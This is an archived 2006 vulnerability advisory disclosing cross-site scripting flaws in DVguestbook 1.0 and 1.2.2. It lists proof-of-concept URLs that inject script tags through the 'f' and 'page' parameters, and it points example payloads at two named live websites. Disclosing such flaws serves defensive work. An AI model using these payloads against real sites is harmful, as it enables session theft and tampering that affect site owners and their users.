Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Simplog <= 1.0.2 Vulnerabilities

Wbb 2.3. xss

Advisory: TotalECommerce (index.asp id) Remote SQL Injection Vulnerability.

[KAPDA::#30] - CuteNews1.4.1 Cross_Site_Scripting Vulnerability

From:	:) :) <liz0_(at)_bsdmail.com>
Date:	05.03.2006
Subject:	DVguestbook 1.0 And 1.2.2 Cross Site Scripting

---------------------------------------------------------------------------------
----
DVguestbook 1.0 And 1.2.2 Cross Site Scripting

Site:http://suprem.free.fr

Credit : Liz0ziM
webpage:www.biyosecurity.com
Mail   :liz0@bsdmail.com

---------------------------------------------------------------------------------
----
DVguestbook 1.0 Xss

http://victim/path/dv_gbook.
php?d=0&f='"><script>alert(document.
cookie)</script>
http://victim/path/dv_gbook.
php?d=0&f='"><script>alert(/BiyoSecurityTeam/)</
script>
http://victim/path/dv_gbook.
php?d=0&f='"><script>alert(document.
domain)</script>

DVguestbook 1.2.2 Xss

http://victim/path/index.php?page="><script>alert(document.
cookie)</script>
http://victim/path/index.
php?page="><script>alert(/Liz0ziM/)</script>
http://victim/path/index.php?page="><script>alert(document.
domain)</script>

---------------------------------------------------------------------------------
----
Example:

DVguestbook 1.0

http://www.award-computer.com/OR/dv_gbook.php?d=0&f='"><script
>alert(/Liz0ziM/)</script>


DVguestbook 1.2.2

http://www.moah-fiya.com/guestbook/index.php?page="><script>alert(
/Liz0ziM/)</script>


---------------------------------------------------------------------------------
-------
Source:

http://www.blogcu.com/Liz0ziM/326668/
http://biyosecurity.be/bugs/dvguestbook.txt